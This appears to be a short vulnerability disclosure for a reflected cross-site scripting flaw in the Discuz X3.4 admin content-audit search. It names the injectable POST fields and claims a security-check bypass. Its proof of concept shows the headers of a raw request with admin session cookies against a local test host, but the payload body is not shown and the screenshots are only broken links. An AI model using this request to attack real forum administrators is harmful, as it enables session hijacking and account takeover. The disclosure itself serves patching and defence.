Discuz-X3.4-SC_UTF8_20221111 with Backend Reflected Cross-Site Scripting in admin.php auditing content.
Description
Admin backend audit search of content audit component with reflected-XSS in POST value dateline, title, tpp and username, which bypassed discuz security check and even could hijack callback url link, and it can also inject javascript to setTimeout at the end of html response.
Affected Version
DiscuzX <= 3.4, SC_UTF8_20221111
POC
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
POST/cms/discuz/upload/admin.php?action=moderate&operation=threadsHTTP/1.1 Host: 192.168.0.4 Content-Length: 166 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.0.4 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.0.4/cms/discuz/upload/admin.php?action=moderate&operation=threads Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: 5Kkn_2132_saltkey=y03s5T45; 5Kkn_2132_lastvisit=1668496347; 5Kkn_2132_ulastactivity=07108qps3b3FkXEEZNxrT%2BtyQpXYN9%2FSOodQCNbMLoO%2BO6DOk8pF; 5Kkn_2132_auth=7791L55DZFdkAgcM5rDcnjIiVH0t%2BptlGCIqLkAhUIRMsUDTnq%2BGi7atBCt%2BPdyl2mCVv0hA3jA%2BxaOfDB1h; 5Kkn_2132_lastcheckfeed=1%7C1668501456; 5Kkn_2132_nofavfid=1; 5Kkn_2132_sid=yhpz44; 5Kkn_2132_lip=172.17.0.1%2C1668502019; 5Kkn_2132_lastact=1668502045%09admin.php%09 Connection: close
/da3b14b2_12015184.png)
/a98c544f_12015184.png)
/c20f32f9_12015184.png)
/d35d3b7c_12015184.png)
/0d4be145_12015184.png)
/b518294b_12015184.png)